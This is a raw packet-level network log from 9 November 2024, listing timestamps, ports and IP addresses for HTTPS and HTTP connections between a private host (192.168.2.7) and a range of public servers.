Nov 9, 2024 02:47:32.935089111 CET	443	52997	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.935755968 CET	53002	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.935830116 CET	443	53002	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.937227011 CET	52997	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:32.937314987 CET	443	52997	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:32.989274025 CET	443	53012	23.218.232.185	192.168.2.7
Nov 9, 2024 02:47:32.989532948 CET	53012	443	192.168.2.7	23.218.232.185
Nov 9, 2024 02:47:32.989545107 CET	443	53012	23.218.232.185	192.168.2.7
Nov 9, 2024 02:47:32.990650892 CET	443	53012	23.218.232.185	192.168.2.7
Nov 9, 2024 02:47:32.990715981 CET	53012	443	192.168.2.7	23.218.232.185
Nov 9, 2024 02:47:32.992172003 CET	53012	443	192.168.2.7	23.218.232.185
Nov 9, 2024 02:47:32.992317915 CET	443	53012	23.218.232.185	192.168.2.7
Nov 9, 2024 02:47:32.992492914 CET	53012	443	192.168.2.7	23.218.232.185
Nov 9, 2024 02:47:32.992501020 CET	443	53012	23.218.232.185	192.168.2.7
Nov 9, 2024 02:47:32.994127989 CET	443	53008	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:32.994376898 CET	53008	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:32.994388103 CET	443	53008	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:32.994709969 CET	443	53008	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:32.995769024 CET	53008	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:32.995842934 CET	443	53008	23.221.22.215	192.168.2.7
Nov 9, 2024 02:47:33.041146994 CET	53004	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.041147947 CET	53007	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.041161060 CET	443	53004	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.041171074 CET	443	53007	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.041198015 CET	53004	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.041201115 CET	53007	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.041203976 CET	443	53004	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.041208029 CET	443	53007	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.042884111 CET	53003	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.042903900 CET	443	53003	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.043939114 CET	53006	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.043943882 CET	443	53006	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.043984890 CET	53006	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.043988943 CET	443	53006	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.056467056 CET	53002	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:33.056478024 CET	443	53002	172.64.41.3	192.168.2.7
Nov 9, 2024 02:47:33.056512117 CET	53008	443	192.168.2.7	23.221.22.215
Nov 9, 2024 02:47:33.060652018 CET	53015	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.060667992 CET	443	53015	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.060844898 CET	53015	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.064763069 CET	53015	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.064776897 CET	443	53015	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.066668034 CET	53016	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.066711903 CET	443	53016	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.067226887 CET	53016	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.067397118 CET	53016	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.067411900 CET	443	53016	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.069739103 CET	53017	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.069750071 CET	443	53017	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.069808006 CET	53017	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.070720911 CET	53017	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.070734978 CET	443	53017	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.071480989 CET	53018	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.071494102 CET	443	53018	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.071660995 CET	53018	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.072041035 CET	53018	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.072052956 CET	443	53018	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.083818913 CET	53019	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:33.083851099 CET	443	53019	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:33.087204933 CET	53019	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:33.087487936 CET	53019	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:33.087498903 CET	443	53019	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:33.087790012 CET	53012	443	192.168.2.7	23.218.232.185
Nov 9, 2024 02:47:33.087845087 CET	52997	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:33.091718912 CET	53020	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.091739893 CET	443	53020	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.091871023 CET	53020	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.092099905 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.092248917 CET	53020	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.092262983 CET	443	53020	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.092497110 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.092504978 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.093396902 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.093463898 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.093542099 CET	443	53005	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.093575001 CET	443	53005	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.093647003 CET	53005	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.093656063 CET	443	53005	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.094109058 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.094588995 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.095787048 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.095834970 CET	53005	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.095846891 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.095848083 CET	443	53005	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.095856905 CET	53005	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.096002102 CET	443	53005	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.096039057 CET	443	53005	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.096088886 CET	53005	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.096180916 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.096180916 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.096189022 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.100351095 CET	53021	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.100373030 CET	443	53021	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.100466967 CET	53021	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.100579977 CET	53021	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.100593090 CET	443	53021	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.119484901 CET	443	53012	23.218.232.185	192.168.2.7
Nov 9, 2024 02:47:33.119513035 CET	443	53012	23.218.232.185	192.168.2.7
Nov 9, 2024 02:47:33.119522095 CET	443	53012	23.218.232.185	192.168.2.7
Nov 9, 2024 02:47:33.119545937 CET	443	53012	23.218.232.185	192.168.2.7
Nov 9, 2024 02:47:33.119555950 CET	443	53012	23.218.232.185	192.168.2.7
Nov 9, 2024 02:47:33.119568110 CET	53012	443	192.168.2.7	23.218.232.185
Nov 9, 2024 02:47:33.119579077 CET	443	53012	23.218.232.185	192.168.2.7
Nov 9, 2024 02:47:33.119590998 CET	443	53012	23.218.232.185	192.168.2.7
Nov 9, 2024 02:47:33.119626999 CET	53012	443	192.168.2.7	23.218.232.185
Nov 9, 2024 02:47:33.119647026 CET	53012	443	192.168.2.7	23.218.232.185
Nov 9, 2024 02:47:33.132971048 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.143330097 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.145507097 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.145528078 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.146013975 CET	53012	443	192.168.2.7	23.218.232.185
Nov 9, 2024 02:47:33.146019936 CET	443	53012	23.218.232.185	192.168.2.7
Nov 9, 2024 02:47:33.146595001 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.146697998 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.148700953 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.148772955 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.148813963 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.167376995 CET	53002	443	192.168.2.7	172.64.41.3
Nov 9, 2024 02:47:33.167478085 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.186338902 CET	53022	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:33.186382055 CET	443	53022	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:33.186568022 CET	53022	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:33.186840057 CET	53022	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:33.186858892 CET	443	53022	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:33.191339016 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.191745996 CET	53023	443	192.168.2.7	3.167.152.61
Nov 9, 2024 02:47:33.191765070 CET	443	53023	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:33.191863060 CET	53023	443	192.168.2.7	3.167.152.61
Nov 9, 2024 02:47:33.192517996 CET	53024	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:33.192549944 CET	443	53024	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:33.192616940 CET	53024	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:33.192711115 CET	53023	443	192.168.2.7	3.167.152.61
Nov 9, 2024 02:47:33.192723036 CET	443	53023	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:33.192894936 CET	53024	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:33.192907095 CET	443	53024	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:33.287220001 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.287249088 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.287331104 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.287760019 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:33.287784100 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:33.287971973 CET	53025	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.287982941 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.288033962 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:33.288149118 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:33.288158894 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:33.304440975 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.309173107 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.359333992 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.359422922 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.380717993 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.380740881 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.380748987 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.380776882 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.380788088 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.380799055 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.380815029 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.380831957 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.380892038 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.380892038 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.391290903 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.391318083 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.391325951 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.391351938 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.391364098 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.391374111 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.391379118 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.391395092 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.391410112 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.391434908 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.391484976 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.393290997 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.393318892 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.393364906 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.393374920 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.393418074 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.402790070 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.402801037 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.402827024 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.402837038 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.402856112 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.402863979 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.402878046 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.402930021 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.402976036 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.501193047 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.501209974 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.501228094 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.501236916 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.501379967 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.501395941 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.501458883 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.511892080 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.511914968 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.512052059 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.512063980 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.513525963 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.513539076 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.513576984 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.513583899 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.513621092 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.513633966 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.513658047 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.515295982 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.515336990 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.515348911 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.515360117 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.515393019 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.515402079 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.515425920 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.522428036 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.522437096 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.522460938 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.522486925 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.522558928 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.522558928 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.522572041 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.523212910 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.523930073 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.523958921 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.524010897 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.524018049 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.524048090 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.524075031 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.524871111 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.524885893 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.524951935 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.524957895 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.525029898 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.541290045 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.541316032 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.541332960 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.541352987 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.541356087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.541398048 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.541421890 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.541423082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.541440964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.541455030 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.541466951 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.541466951 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.541466951 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.541491985 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.541547060 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.541559935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.541588068 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.541625977 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.541718960 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.541737080 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.541765928 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.541781902 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.546188116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.546215057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.546287060 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.546313047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.547209978 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.573177099 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.573198080 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.573323011 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.573347092 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.621512890 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.621537924 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.621623039 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.621638060 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.621690035 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.633085966 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.633111954 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.633119106 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.633150101 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.633151054 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.633167982 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.633205891 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.633912086 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.633925915 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.633960009 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.633966923 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.633971930 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.633985043 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.634002924 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.634048939 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.634567976 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.634582043 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.634615898 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.634665966 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.634665966 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.634685040 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.635536909 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.635557890 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.635607958 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.635616064 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.635634899 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.636449099 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.636472940 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.636538029 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.636544943 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.636595011 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.641830921 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.641849041 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.641892910 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.641910076 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.641948938 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.642774105 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.642790079 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.642848015 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.642862082 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.642915010 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.643956900 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.643973112 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.644035101 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.644041061 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.644089937 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.644933939 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.644954920 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.645041943 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.645041943 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.645050049 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.645128965 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.646435022 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.646461010 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.646502018 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.646509886 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.646574974 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.646601915 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.647160053 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.647289038 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.647306919 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.647428036 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.647434950 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.647514105 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.651004076 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.651041031 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.651072979 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.651082039 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.651129007 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.658279896 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.658389091 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.658411026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.658427000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.658442020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.658451080 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.658454895 CET	80	52982	77.220.212.32	192.168.2.7
